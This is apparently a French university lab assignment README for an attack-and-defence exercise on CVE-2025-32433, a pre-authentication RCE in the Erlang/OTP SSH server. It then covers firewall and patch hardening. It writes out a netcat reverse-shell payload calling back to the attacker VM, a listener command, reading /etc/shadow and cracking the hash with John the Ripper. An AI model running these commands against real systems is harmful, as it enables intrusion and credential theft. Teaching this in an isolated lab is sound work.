
Ce projet simule un scénario réaliste d'attaque et de défense sur deux machines virtuelles. Vous exploiterez une vulnérabilité critique de RCE pré-authentification (CVE-2025-32433) dans un serveur SSH Erlang/OTP, craquerez les hashs de mots de passe extraits, puis durcirez la machine victime avec des règles de pare-feu et des correctifs.
Points totaux : 20 | Date limite : Aucune soumission tardive acceptée
Ce projet simule un scénario réaliste d'attaque et de défense entre deux machines virtuelles. Vous exploiterez une vulnérabilité critique de RCE pré-authentification (CVE-2025-32433) dans un serveur SSH Erlang/OTP, casserez les hash de mots de passe extraits, puis durcirez la machine victime avec des règles de pare-feu et des correctifs.
| Rôle | OS |
|---|---|
| Attaquant | Kali Linux |
| Victime | Ubuntu/Debian (Erlang/OTP SSH v27.3.2) |
| Fichier | Description |
|---|---|
Debian-1.ova | Image VM victime préconstruite — à télécharger séparément, voir Ressources (trop volumineuse pour GitHub) |
Debian-1.ova) : Lien de téléchargement — trop volumineuse (~3 Go) pour être hébergée sur GitHub. Téléchargez-la séparément et importez-la dans VirtualBox/VMware comme décrit ci-dessous.rockyou_txt.txt) : incluse dans ce dépôt, utilisée pour l'étape de cassage de mot de passe dans la Partie 2.Debian-1.ova et votre VM Kali Linux dans VirtualBox/VMware.ifconfig pour trouver son IP (généralement dans 192.168.56.0/24).nmap -p 2222 -sV -A <victim-IP>
Documentez les ports ouverts, les versions des services et les signatures Erlang.
Basculez temporairement Kali en NAT pour cloner le dépôt, puis repassez en Host-Only.
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py
Modifiez le script — définissez HOST = "<victim-IP>" et mettez à jour le payload :
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'
Terminal 1 (Kali) — démarrez le listener :
nc -lvnp 4444
Terminal 2 (Kali) — lancez l'exploit :
python3 CVE-2025-32433.py
Dans le shell inversé, exécutez whoami et hostname pour confirmer l'accès.
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt
# On Kali
john --wordlist=rockyou_txt.txt hash.txt
Documentez le format du hash (par ex. $6$ = SHA-512), le temps nécessaire et le mot de passe en clair récupéré.
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP
Relancez le scan Nmap et l'exploit depuis Kali — documentez que le port 2222 est désormais « Filtered » et que l'exploit échoue.
Documentez les étapes pour mettre à niveau Erlang/OTP vers v27.3.3 ou ultérieure, qui contient le correctif pour CVE-2025-32433.
whoami/hostname), capture du flagCVE-2025-32433 — Exécution de code à distance critique avant authentification dans le serveur SSH Erlang/OTP. Exploitable en envoyant des paquets SSH malformés avant tout échange d'identifiants, donnant à un attaquant non authentifié un accès shell complet.
Project Spring 2026 - Google Docs.pdf | Instructions complètes du projet avec livrables |
rockyou_txt.txt | Liste de mots utilisée avec John the Ripper pour casser le hash du mot de passe extrait |